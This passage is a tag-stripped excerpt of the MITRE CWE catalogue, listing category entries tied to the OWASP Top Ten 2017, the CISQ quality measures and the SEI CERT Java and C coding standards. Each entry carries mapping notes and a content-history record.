updated Mapping_Notes + + + + + Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2017. + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2017. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2017. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2017. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + While the OWASP document maps to CWE-2 and CWE-388, these are not appropriate for mapping, as they are high-level categories that are only intended for the Seven Pernicious Kingdoms view (CWE-700). + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2017. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2017. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + This is an unusual category. CWE does not cover the limitations of human processes and procedures that cannot be described in terms of a specific technical weakness as resident in the code, architecture, or configuration of the software. Since "known vulnerabilities" can arise from any kind of weakness, it is not possible to map this OWASP category to other CWE entries, since it would effectively require mapping this category to ALL weaknesses. + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2017. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the CISQ Quality Measures for Reliability, as documented in 2016 with the Automated Source Code CISQ Reliability Measure (ASCRM) Specification 1.0. Presence of these weaknesses could reduce the reliability of the software. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-07-23 + 3.2 + 2019-01-03 + Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. + + + CWE Content Team + MITRE + 2020-06-25 + updated References + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Name + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CISQ Quality Measures - Reliability + + + + Weaknesses in this category are related to the CISQ Quality Measures for Maintainability, as documented in 2016 with the Automated Source Code Maintainability Measure (ASCMM) Specification 1.0. Presence of these weaknesses could reduce the maintainability of the software. + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-07-23 + 3.2 + 2019-01-03 + Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. + + + CWE Content Team + MITRE + 2020-06-25 + updated References + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Name + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CISQ Quality Measures - Maintainability + + + + Weaknesses in this category are related to the CISQ Quality Measures for Security, as documented in 2016 with the Automated Source Code Security Measure (ASCSM) Specification 1.0. Presence of these weaknesses could reduce the security of the software. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-07-23 + 3.2 + 2019-01-03 + Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. + + + CWE Content Team + MITRE + 2020-06-25 + updated References + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Name + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CISQ Quality Measures - Security + + + + Weaknesses in this category are related to the CISQ Quality Measures for Performance Efficiency, as documented in 2016 with the Automated Source Code Performance Efficiency Measure (ASCPEM) Specification 1.0. Presence of these weaknesses could reduce the performance efficiency of the software. + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-07-23 + 3.2 + 2019-01-03 + Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. + + + CWE Content Team + MITRE + 2020-06-25 + updated References + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Name + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CISQ Quality Measures - Performance + + + + Weaknesses in this category are related to the rules and recommendations in the Input Validation and Data Sanitization (IDS) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Declarations and Initialization (DCL) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Expressions (EXP) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Numeric Types and Operations (NUM) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Characters and Strings (STR) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Object Orientation (OBJ) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Methods (MET) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Exceptional Behavior (ERR) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Visibility and Atomicity (VNA) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Locking (LCK) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Thread APIs (THI) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Thread Pools (TPS) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Thread-Safety Miscellaneous (TSM) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Input Output (FIO) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Serialization (SER) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Platform Security (SEC) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Runtime Environment (ENV) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Java Native Interface (JNI) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Miscellaneous (MSC) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Android (DRD) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2019-06-20 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Preprocessor (PRE) section of the SEI CERT C Coding Standard. + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Declarations and Initialization (DCL) section of the SEI CERT C Coding Standard. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Expressions (EXP) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Integers (INT) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Floating Point (FLP) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Arrays (ARR) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Characters and Strings (STR) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Memory Management (MEM) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Input Output (FIO) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Environment (ENV) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Signals (SIG) section of the SEI CERT C Coding Standard. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Error Handling (ERR) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Application Programming Interfaces (API) section of the SEI CERT C Coding Standard. + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Concurrency (CON) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Miscellaneous (MSC) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the POSIX (POS) section of the SEI CERT C Coding Standard. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Microsoft Windows (WIN) section of the SEI CERT C Coding Standard. + + 